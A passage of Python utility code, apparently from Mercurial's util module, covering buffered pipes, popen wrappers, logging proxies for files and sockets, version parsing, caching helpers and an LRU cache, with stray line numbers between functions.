        if lfi < 0: # end of file
            size = self._lenbuf
        elif 1 < len(self._buffer):
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if 1 < len(self._buffer):
            # Collapse all pending chunks into a single string first.
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        # Re-establish the invariant: at most one chunk remains buffered.
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self):
        """read data to the buffer"""
        # Unbuffered os.read() so select()/poll() semantics stay accurate.
        data = os.read(self._input.fileno(), _chunksize)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

        return data
458
458
def mmapread(fp):
    """Return a read-only memory map of the entire contents of ``fp``.

    ``fp`` may be a file object (anything with ``fileno()``) or a raw file
    descriptor. Empty files cannot be mmapped, so ``b''`` is returned for
    them instead of raising.
    """
    try:
        # Accept either a file object or a bare descriptor.
        fd = getattr(fp, 'fileno', lambda: fp)()
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            # Return bytes (not the str '') so the fallback matches the
            # bytes-like object mmap.mmap() yields on Python 3.
            return b''
        raise
469
469
def popen2(cmd, env=None, newlines=False):
    """Spawn ``cmd`` through the shell; return its (stdin, stdout) pipes."""
    # Setting bufsize to -1 lets the system decide the buffer size.
    # The default for bufsize is 0, meaning unbuffered. This leads to
    # poor performance on Mac OS X: http://bugs.python.org/issue4194
    proc = subprocess.Popen(cmd,
                            shell=True,
                            bufsize=-1,
                            close_fds=closefds,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            universal_newlines=newlines,
                            env=env)
    return proc.stdin, proc.stdout
480
480
def popen3(cmd, env=None, newlines=False):
    """Spawn ``cmd``; return its (stdin, stdout, stderr) pipes.

    Identical to popen4() except the Popen object itself is discarded.
    """
    pipes = popen4(cmd, env, newlines)
    return pipes[0], pipes[1], pipes[2]
484
484
def popen4(cmd, env=None, newlines=False, bufsize=-1):
    """Spawn ``cmd`` through the shell.

    Returns a 4-tuple of the child's stdin, stdout and stderr pipes plus
    the Popen object itself.
    """
    proc = subprocess.Popen(cmd,
                            shell=True,
                            bufsize=bufsize,
                            close_fds=closefds,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            universal_newlines=newlines,
                            env=env)
    return proc.stdin, proc.stdout, proc.stderr, proc
493
493
class fileobjectproxy(object):
    """A proxy around file objects that tells a watcher when events occur.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    # __slots__ keeps instances free of a __dict__, which matters because
    # __setattr__ below forwards all attribute writes to the wrapped object.
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, fh, observer):
        # object.__setattr__ bypasses our own __setattr__ delegation so these
        # two attributes land on the proxy itself.
        object.__setattr__(self, r'_orig', fh)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        # Names served by the proxy itself; everything else falls through to
        # the wrapped file object at the bottom of this method.
        ours = {
            r'_observer',

            # IOBase
            r'close',
            # closed if a property
            r'fileno',
            r'flush',
            r'isatty',
            r'readable',
            r'readline',
            r'readlines',
            r'seek',
            r'seekable',
            r'tell',
            r'truncate',
            r'writable',
            r'writelines',
            # RawIOBase
            r'read',
            r'readall',
            r'readinto',
            r'write',
            # BufferedIOBase
            # raw is a property
            r'detach',
            # read defined above
            r'read1',
            # readinto defined above
            # write defined above
        }

        # We only observe some methods.
        if name in ours:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __iter__(self):
        return object.__getattribute__(self, r'_orig').__iter__()

    def _observedcall(self, name, *args, **kwargs):
        """Invoke ``name`` on the wrapped object, then notify the observer.

        If the observer defines a method of the same name, it is called with
        the operation's result followed by the original arguments.
        """
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    # Each of the methods below simply forwards through _observedcall so the
    # observer can see every invocation. object.__getattribute__ is used to
    # dodge the delegation in __getattribute__ above.
    def close(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'close', *args, **kwargs)

    def fileno(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'fileno', *args, **kwargs)

    def flush(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'flush', *args, **kwargs)

    def isatty(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'isatty', *args, **kwargs)

    def readable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readable', *args, **kwargs)

    def readline(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readline', *args, **kwargs)

    def readlines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readlines', *args, **kwargs)

    def seek(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seek', *args, **kwargs)

    def seekable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seekable', *args, **kwargs)

    def tell(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'tell', *args, **kwargs)

    def truncate(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'truncate', *args, **kwargs)

    def writable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writable', *args, **kwargs)

    def writelines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writelines', *args, **kwargs)

    def read(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read', *args, **kwargs)

    def readall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readall', *args, **kwargs)

    def readinto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readinto', *args, **kwargs)

    def write(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'write', *args, **kwargs)

    def detach(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'detach', *args, **kwargs)

    def read1(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read1', *args, **kwargs)
651
651
class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """

    def _notify(self, event, *args):
        # Forward an event to the proxied file's observer, if the observer
        # implements a handler for it.
        handler = getattr(self._input._observer, event, None)
        if handler:
            handler(*args)

    def _fillbuffer(self):
        result = super(observedbufferedinputpipe, self)._fillbuffer()
        self._notify(r'osread', result, _chunksize)
        return result

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        result = super(observedbufferedinputpipe, self).read(size)
        self._notify(r'bufferedread', result, size)
        return result

    def readline(self, *args, **kwargs):
        result = super(observedbufferedinputpipe, self).readline(*args,
                                                                 **kwargs)
        self._notify(r'bufferedreadline', result)
        return result
691
691
# Socket methods intercepted by socketproxy.__getattribute__; every other
# attribute access is delegated directly to the wrapped socket.
PROXIED_SOCKET_METHODS = {
    r'makefile',
    r'recv',
    r'recvfrom',
    r'recvfrom_into',
    r'recv_into',
    r'send',
    r'sendall',
    r'sendto',
    r'setblocking',
    r'settimeout',
    r'gettimeout',
    r'setsockopt',
}

class socketproxy(object):
    """A proxy around a socket that tells a watcher when events occur.

    This is like ``fileobjectproxy`` except for sockets.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    # __slots__ keeps instances free of a __dict__; __setattr__ below
    # forwards all attribute writes to the wrapped socket.
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, sock, observer):
        # object.__setattr__ bypasses our own __setattr__ delegation so these
        # two attributes land on the proxy itself.
        object.__setattr__(self, r'_orig', sock)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        # Only the proxied methods are served by this class; everything else
        # is forwarded to the wrapped socket.
        if name in PROXIED_SOCKET_METHODS:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def _observedcall(self, name, *args, **kwargs):
        """Invoke ``name`` on the wrapped socket, then notify the observer.

        If the observer defines a method of the same name, it is called with
        the operation's result followed by the original arguments.
        """
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def makefile(self, *args, **kwargs):
        res = object.__getattribute__(self, r'_observedcall')(
            r'makefile', *args, **kwargs)

        # The file object may be used for I/O. So we turn it into a
        # proxy using our observer.
        observer = object.__getattribute__(self, r'_observer')
        return makeloggingfileobject(observer.fh, res, observer.name,
                                     reads=observer.reads,
                                     writes=observer.writes,
                                     logdata=observer.logdata,
                                     logdataapis=observer.logdataapis)

    def recv(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv', *args, **kwargs)

    def recvfrom(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom', *args, **kwargs)

    def recvfrom_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom_into', *args, **kwargs)

    def recv_into(self, *args, **kwargs):
        # Fix: dispatch to ``recv_into`` — the previous name ``recv_info``
        # does not exist on socket objects, so this method always raised
        # AttributeError instead of proxying the call.
        return object.__getattribute__(self, r'_observedcall')(
            r'recv_into', *args, **kwargs)

    def send(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'send', *args, **kwargs)

    def sendall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendall', *args, **kwargs)

    def sendto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendto', *args, **kwargs)

    def setblocking(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setblocking', *args, **kwargs)

    def settimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'settimeout', *args, **kwargs)

    def gettimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'gettimeout', *args, **kwargs)

    def setsockopt(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setsockopt', *args, **kwargs)
811
811
# Map every single byte to its ``\xNN`` escape, then special-case backslash,
# CR and LF so they render as ``\\``, ``\r`` and ``\n`` in log output.
DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
DATA_ESCAPE_MAP.update({
    b'\\': b'\\\\',
    b'\r': br'\r',
    b'\n': br'\n',
})
# Bytes that need escaping: control bytes other than TAB (\x09), backslash,
# and DEL plus all non-ASCII bytes. Printable ASCII and TAB pass through.
DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
819
819
def escapedata(s):
    """Return ``s`` with bytes unsafe for single-line log output escaped.

    Control characters, backslashes and non-ASCII bytes are rewritten
    using DATA_ESCAPE_MAP (``\\xNN`` or the ``\\r``/``\\n``/``\\\\``
    shorthand). A ``bytearray`` input is first converted to ``bytes`` so
    the regex keys match.
    """
    data = bytes(s) if isinstance(s, bytearray) else s
    return DATA_ESCAPE_RE.sub(
        lambda match: DATA_ESCAPE_MAP[match.group(0)], data)
825
825
class baseproxyobserver(object):
    """Shared payload-logging helper for the proxy observers.

    Concrete observers set ``fh``, ``name``, ``logdata`` and
    ``logdataapis`` attributes that control what gets written.
    """
    def _writedata(self, data):
        """Append ``data`` (an I/O payload) to the log stream.

        The exact output shape depends on the ``logdata`` and
        ``logdataapis`` flags of the concrete observer.
        """
        fh = self.fh
        if not self.logdata:
            # Payload logging is off; just terminate the API line, if any.
            if self.logdataapis:
                fh.write('\n')
                fh.flush()
            return

        if b'\n' in data:
            # Data with newlines is written to multiple lines.
            if self.logdataapis:
                fh.write(':\n')

            for chunk in data.splitlines(True):
                fh.write('%s> %s\n' % (self.name, escapedata(chunk)))
            fh.flush()
            return

        # Simple case writes all data on a single line.
        if self.logdataapis:
            fh.write(': %s\n' % escapedata(data))
        else:
            fh.write('%s> %s\n' % (self.name, escapedata(data)))
        fh.flush()
851
851
class fileobjectobserver(baseproxyobserver):
    """Logs file object activity."""
    def __init__(self, fh, name, reads=True, writes=True, logdata=False,
                 logdataapis=True):
        # Stream the log is written to.
        self.fh = fh
        # Prefix identifying the observed file in each log line.
        self.name = name
        # Whether to log operation payloads in addition to the API calls.
        self.logdata = logdata
        # Whether to log one line per API call (name, sizes, result).
        self.logdataapis = logdataapis
        # Toggles for the read-side and write-side operations respectively.
        self.reads = reads
        self.writes = writes

    # The observer methods below receive the operation's result first,
    # followed by the original call arguments (see
    # fileobjectproxy._observedcall).
    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            # NOTE(review): '' is a str; on Python 3 a bytes payload path
            # would mix types in _writedata — confirm intended.
            res = ''

        if self.logdataapis:
            self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))

        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
                                                      res))

        # res is the byte count written into dest (or None); log that slice.
        data = dest[0:res] if res is not None else b''
        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        if self.logdataapis:
            self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))

        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedread(%d) -> %d' % (
                self.name, size, len(res)))

        self._writedata(res)

    def bufferedreadline(self, res):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedreadline() -> %d' % (
                self.name, len(res)))

        self._writedata(res)
935
935
def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False, logdataapis=True):
    """Turn a file object into a logging file object.

    Returns a proxy around ``fh`` that mirrors its activity to ``logh``;
    the keyword arguments control which APIs and how much payload data
    are logged.
    """
    return fileobjectproxy(
        fh,
        fileobjectobserver(logh, name, reads=reads, writes=writes,
                           logdata=logdata, logdataapis=logdataapis))
943
943
class socketobserver(baseproxyobserver):
    """Logs socket activity.

    Each method receives the proxied call's return value (``res``) first,
    followed by the original call's arguments, mirroring how the proxy
    invokes its observer for the file-object observer above.
    """
    def __init__(self, fh, name, reads=True, writes=True, states=True,
                 logdata=False, logdataapis=True):
        self.fh = fh
        self.name = name
        self.reads = reads
        self.writes = writes
        self.states = states
        self.logdata = logdata
        self.logdataapis = logdataapis

    def makefile(self, res, mode=None, bufsize=None):
        if not self.states:
            return

        self.fh.write('%s> makefile(%r, %r)\n' % (
            self.name, mode, bufsize))

    def recv(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv(%d, %d) -> %d' % (
                self.name, size, flags, len(res)))
        self._writedata(res)

    def recvfrom(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            # res is a (data, address) tuple; log the payload length.
            self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
                self.name, size, flags, len(res[0])))

        self._writedata(res[0])

    def recvfrom_into(self, res, buf, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            # res is a (nbytes, address) tuple.
            self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
                self.name, size, flags, res[0]))

        self._writedata(buf[0:res[0]])

    def recv_into(self, res, buf, size=0, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv_into(%d, %d) -> %d' % (
                self.name, size, flags, res))

        self._writedata(buf[0:res])

    def send(self, res, data, flags=0):
        if not self.writes:
            return

        # socket.send() returns the number of bytes sent (an int), so log
        # it directly; calling len() on it would raise TypeError.
        self.fh.write('%s> send(%d, %d) -> %d' % (
            self.name, len(data), flags, res))
        self._writedata(data)

    def sendall(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # Returns None on success. So don't bother reporting return value.
            self.fh.write('%s> sendall(%d, %d)' % (
                self.name, len(data), flags))

        self._writedata(data)

    def sendto(self, res, data, flagsoraddress, address=None):
        if not self.writes:
            return

        # sendto() has two call forms; the flags argument is optional.
        if address:
            flags = flagsoraddress
        else:
            flags = 0

        if self.logdataapis:
            self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
                self.name, len(data), flags, address, res))

        self._writedata(data)

    def setblocking(self, res, flag):
        if not self.states:
            return

        self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))

    def settimeout(self, res, value):
        if not self.states:
            return

        self.fh.write('%s> settimeout(%r)\n' % (self.name, value))

    def gettimeout(self, res):
        if not self.states:
            return

        self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))

    def setsockopt(self, res, level, optname, value):
        # Like every other observer method, receive the proxied call's
        # return value first; the previous signature omitted ``res`` and
        # fed a 4-tuple to a 5-specifier format string, raising TypeError
        # whenever the proxy invoked it.
        if not self.states:
            return

        self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
            self.name, level, optname, value, res))
1060
1060
def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
                      logdata=False, logdataapis=True):
    """Turn a socket into a logging socket.

    Returns a proxy around socket ``fh`` that mirrors its activity to
    ``logh``.
    """
    return socketproxy(
        fh,
        socketobserver(logh, name, reads=reads, writes=writes,
                       states=states, logdata=logdata,
                       logdataapis=logdataapis))
1069
1069
def version():
    """Return version information if available.

    Falls back to 'unknown' when the generated __version__ module is not
    importable (e.g. running from a source checkout without a build step).
    """
    try:
        from . import __version__
    except ImportError:
        return 'unknown'
    return __version__.version
1077
1077
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')
    """
    if not v:
        v = version()
    # Split off the "extra" suffix at the first '+' or '-'. Use a raw
    # string: '\+' is an invalid escape sequence in a plain string literal
    # and triggers a DeprecationWarning on modern Pythons.
    parts = remod.split(r'[\+-]', v, 1)
    if len(parts) == 1:
        vparts, extra = parts[0], None
    else:
        vparts, extra = parts

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            # Stop at the first non-numeric component (e.g. 'rc').
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)
1146
1146
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    argcount = func.__code__.co_argcount

    if argcount == 0:
        # A zero-argument function has at most one result; stash it in a
        # one-element list once computed.
        results = []

        def wrapped():
            if not results:
                results.append(func())
            return results[0]
        return wrapped

    memo = {}
    if argcount == 1:
        # Keying on the bare argument avoids tuple pack/unpack overhead.
        def wrapped(arg):
            if arg not in memo:
                memo[arg] = func(arg)
            return memo[arg]
    else:
        def wrapped(*args):
            if args not in memo:
                memo[args] = func(*args)
            return memo[args]

    return wrapped
1172
1172
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        # _copied counts outstanding cheap copies; while any exist, a
        # write must first materialize a real copy.
        copied = getattr(self, '_copied', 0)
        if not copied:
            return self
        self._copied = copied - 1
        return self.__class__(self)

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self
1190
1190
class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        # Deleting an existing key before re-inserting moves it to the
        # end, giving "last-set" iteration order rather than
        # OrderedDict's default "first-set" order.
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v
1215
1215
class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    Cheap copies share the same underlying object until one side calls
    preparewrite(), at which point a real copy is made.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """
1241
1241
class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.

    See ``cowdict`` for how cheap copies behave.
    """
1247
1247
class transactional(object):
    """Base class for making a transactional type into a context manager."""
    # Python 2 style metaclass declaration; subclasses must implement
    # close() and release().
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Close only on a clean exit; release() always runs, so an
        # unclosed transaction is aborted even when close() raises.
        try:
            if exc_type is None:
                self.close()
        finally:
            self.release()
1272
1272
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        # InterventionRequired is a deliberate, user-facing stop: commit
        # (close) the work done so far before propagating it.
        tr.close()
        raise
    finally:
        # release() aborts the transaction if it was never closed.
        tr.release()
1290
1290
@contextlib.contextmanager
def nullcontextmanager():
    """A context manager that does nothing on enter or exit."""
    yield
1294
1294
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    # Slots keep per-node overhead low; a cache may hold many nodes.
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        # Link pointers are wired up by the owning lrucachedict.
        self.prev = None
        self.next = None

        # ``_notset`` marks a slot that currently holds no cache entry.
        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
1313
1313
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.
    """
    def __init__(self, max):
        self._cache = {}

        # Start with a single self-linked node; capacity grows lazily.
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self._capacity = max

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

            # At capacity. Kill the old entry.
            if node.key is not _notset:
                del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        """Return the cached value for ``k``, or ``default`` if absent.

        Unlike __getitem__, this does not refresh the entry's recency.
        """
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        """Remove all entries, keeping the allocated nodes for reuse."""
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self):
        """Return a new cache with the same entries and ordering."""
        result = lrucachedict(self._capacity)

        # Iterate in oldest-to-newest order, so the copy has the right
        # ordering.
        #
        # Nodes emptied by __delitem__ linger in the linked list at its
        # oldest end. Skip them first: otherwise we would copy a bogus
        # ``_notset`` key and drop the newest real entries, since the
        # loop below only visits len(self._cache) nodes.
        n = self._head.prev
        while n.key is _notset and n is not self._head:
            n = n.prev

        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev

        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

        previous/oldest <-> head <-> next/next newest

        ----<->--- A* ---<->-----
        |                       |
        E <-> D <-> N <-> C <-> B

        To:

        ----<->--- N* ---<->-----
        |                       |
        E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node
1472
1472
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    results = {}
    lru = collections.deque()

    if func.__code__.co_argcount == 1:
        # Single-argument variant keys on the bare argument to avoid
        # tuple packing overhead.
        def wrapped(arg):
            if arg not in results:
                # Evict the least recently used entry once more than 20
                # results are cached.
                if len(results) > 20:
                    del results[lru.popleft()]
                results[arg] = func(arg)
            else:
                lru.remove(arg)
            lru.append(arg)
            return results[arg]
    else:
        def wrapped(*args):
            if args not in results:
                if len(results) > 20:
                    del results[lru.popleft()]
                results[args] = func(*args)
            else:
                lru.remove(args)
            lru.append(args)
            return results[args]

    return wrapped
1499
1499
class propertycache(object):
    """Non-data descriptor that caches a computed attribute.

    The wrapped function runs on first access; its result is written into
    the instance __dict__ under the same name via cachevalue(), so later
